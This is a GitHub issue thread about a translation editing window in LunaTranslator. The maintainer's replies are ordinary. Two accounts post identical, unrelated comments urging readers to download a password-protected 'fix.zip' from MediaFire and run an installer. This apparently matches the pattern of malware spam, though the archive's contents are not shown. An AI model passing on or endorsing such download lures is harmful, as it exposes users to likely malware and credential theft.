### ISSUE TITLE
Translation editing window

### ISSUE THREAD

**Issue by linakima** [HIllya51/LunaTranslator#1032]
-

**Comment by abdulhkeemGit** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by itbear-shu** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by HIllya51** [comment]
What do you want to ask?

**Comment by HIllya51** [comment]
Can't. 
This is a deprecated feature, but I'm keeping it because someone has asked me to do so, and I won't be making any changes to it.
